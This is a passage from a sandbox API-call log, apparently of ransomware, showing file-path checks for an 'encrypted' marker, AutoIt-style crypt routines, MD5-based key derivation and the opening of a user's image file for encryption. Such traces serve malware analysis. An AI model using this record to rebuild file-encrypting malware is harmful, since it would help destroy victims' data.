dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xmQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mQr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qr1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dlVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lVzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VzwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwDk.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.023] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.023] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.023] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.023] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.024] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab63280, ftCreationTime.dwHighDateTime=0x1d5bf24, ftLastAccessTime.dwLowDateTime=0x9c732570, ftLastAccessTime.dwHighDateTime=0x1d5b9ec, ftLastWriteTime.dwLowDateTime=0x9c732570, ftLastWriteTime.dwHighDateTime=0x1d5b9ec, nFileSizeHigh=0x0, nFileSizeLow=0xece8, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="dlVzwDk.bmp", cAlternateFileName="")) returned 0x7c2240 [0041.024] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.024] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.024] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.024] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.024] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.024] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.025] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.025] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.025] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.025] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.025] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0041.025] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.025] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0041.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.026] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.026] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.026] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.026] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.026] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.026] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.026] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.027] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.027] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.027] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.027] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.028] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.028] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.028] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.028] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.028] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.028] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.028] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.029] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.029] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.029] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.029] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.029] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0041.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.029] CryptDestroyHash (hHash=0x7c2100) returned 1 [0041.029] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.029] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\dlvzwdk.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.030] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.030] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0041.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0041.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.030] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.031] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.031] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 